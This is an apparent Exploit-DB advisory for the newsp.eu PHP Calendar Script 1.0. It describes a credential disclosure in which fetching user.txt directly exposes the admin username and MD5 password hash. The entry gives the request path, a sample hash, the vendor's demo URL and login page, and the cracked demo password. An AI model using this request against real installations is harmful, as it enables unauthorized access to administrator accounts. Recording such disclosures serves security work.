newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure

2016-07-19T00:00:00
ID EDB-ID:40127
Type exploitdb
Reporter Meisam Monsef
Modified 2016-07-19T00:00:00

Description

newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure. Webapps exploit for PHP platform

                                        
                                            # Exploit Title: PHP calendar script Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st
# Version: All Version
# Download Link : http://www.newsp.eu/calendar.zip

Exploit :
http://site/user.txt
Admin|fe01ce2a7fbac8fafaed7c982a04e229
Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]

Test :
Exploit : http://www.newsp.eu/demo/user.txt
Login Url : http://www.newsp.eu/demo/login.php
Password : demo